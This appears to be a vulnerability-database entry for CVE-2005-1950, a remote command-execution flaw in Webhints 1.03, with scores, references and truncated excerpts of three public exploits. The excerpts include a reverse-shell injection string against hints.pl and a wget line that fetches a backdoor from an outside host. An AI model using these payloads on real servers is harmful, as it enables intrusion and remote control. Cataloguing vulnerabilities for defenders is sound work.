CVE-2005-1950
published 2005-06-09CVE-2005-1950: hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.61%
94.9th percentile
hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| darryl_burgdorf | webhints | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Webhints 1.03 - Remote Command Execution (Perl) (3)
exploitdb·2005-06-11
CVE-2005-1950 Webhints 1.03 - Remote Command Execution (Perl) (3)
Webhints 1.03 - Remote Command Execution (Perl) (3)
---
#!/usr/bin/perl -w
#
#
#emanuele@blackbox:~$ perl M4DR007-hints.pl
#
#
# ~~ www.madroot.edu.ms Security Group ~~
#
# WebHints Software hints.cgi
# Remote Command Execution Vulnerability
# Affected version: );
print "port: (default: 80)\n";
chomp($port=);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );
print "path: (/cgi-bin/)\n";
chomp($path=);
print "your ip (for reverse connect): \n";
chomp($ip=);
print "your port (for reverse connect): \n";
chomp($reverse=);
print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
print "[*] try to exploiting...\n";
$string="/$path/hints.pl?|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton
Exploit-DB
Webhints 1.03 - Remote Command Execution (C) (2)
exploitdb·2005-06-11
CVE-2005-1950 Webhints 1.03 - Remote Command Execution (C) (2)
Webhints 1.03 - Remote Command Execution (C) (2)
---
/*
* T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m *
EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln
Coded By: A l p h a _ P r o g r a m m e r (Sirus-v)
E-Mail: [email protected]
This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself
* GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- The-CephaleX -- Str0ke *
*And Iranian Security & Technical Sites: *
* *
* TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG *
* Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & GrayHatz.NeT *
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#include
#define MY_PORT 80
#define BUF_LEN 256
/***************************************************************************
Exploit-DB
Webhints 1.03 - Remote Command Execution (Perl) (1)
exploitdb·2005-06-11
CVE-2005-1950 Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution (Perl) (1)
---
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
###################################
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111842893001406&w=2http://secunia.com/advisories/15652http://securitytracker.com/id?1014173http://www.securityfocus.com/bid/13930http://marc.info/?l=bugtraq&m=111842893001406&w=2http://secunia.com/advisories/15652http://securitytracker.com/id?1014173http://www.securityfocus.com/bid/13930
2005-06-09
Published